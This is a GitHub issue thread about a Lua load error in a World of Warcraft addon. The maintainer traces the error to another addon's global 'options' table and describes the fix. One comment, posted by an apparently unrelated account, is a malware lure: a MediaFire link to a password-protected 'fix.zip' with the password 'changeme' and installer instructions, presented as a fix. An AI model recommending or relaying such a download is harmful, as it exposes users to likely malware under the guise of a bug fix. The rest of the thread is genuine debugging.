### ISSUE TITLE
LUA Error on load

### ISSUE THREAD

**Issue by JVemmer** [TomCats/TomCats-WoW-AddOns#3]
```lua
55x TomCats/options/Home.lua:4: attempt to call global 'CreateFrame' (a nil value)
[string "@TomCats/options/Home.lua"]:4: in main chunk

Locals:
(*temporary) = nil
(*temporary) = "Frame"
(*temporary) = "attempt to call global 'CreateFrame' (a nil value)"
```
Running version 2.5.42, WoW Retail

**Comment by TomCats** [comment]
This error is only possible by altering the TomCat's Tours installation from what was distributed, or if the setfenv function is somehow operating differently in your environment than for everyone else.  In either case, this isn't something that I can fix by altering my addon code, but I'm curious as to what's happening in your environment to do this.  I see that you also work on addons, so feel free to reach out to me on Discord to take a look if you're stuck.  The name on there is tomcatsgaming.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JVemmer** [comment]
I just downloaded it off of wago.io, and haven't touched it beyond that. I am running other addons that may interfere, such as ElvUI, ElvUI_WindTools and WeakAuras, though I have disabled the skin in ElvUI_WindTools.
Beyond that, my installation is a fresh WoW install, with pretty minimal addons, and no other addons are currently reporting issues.
The frame itself is shown, but I cannot access options (which makes sense, as the error occurs within options).

If there's any type of debugging I can do, please let me know :heart:

**Comment by TomCats** [comment]
Yes. Try it with all the other addons disabled. The error you've provided simply cannot occur aside from the 2 conditions I already mentioned.  If you haven't done something to alter the addon or the functionality of 'setfenv' then this must be coming from another addon.

**Comment by JVemmer** [comment]
I can't say what they do that cause the breakage, but disabling the addon [Alts](https://github.com/Talryn/Alts), solved the issue.

**Comment by TomCats** [comment]
Thanks. I found something helpful here that led me to a code change I can make.

The Alts addon is creating a global table with the generic name 'options,' likely intended to be local. My addon doesn’t create a global 'options' variable; instead, it uses a sandbox to mimic a global scope for my addon. However, due to a fallback mechanism I overlooked, my code unintentionally found and used the 'options' table from the global scope instead of creating a new one, causing initialization issues. I’ll fix this in the next release by adding logic to prevent the fallback from reaching the global scope when searching for a sub-scope.  Meanwhile, the author of Alts should be informed that their use of a variable named 'options' in the global scope is likely to create issues for them regardless of what I do with my addon.  I'll go ahead and send them a note.
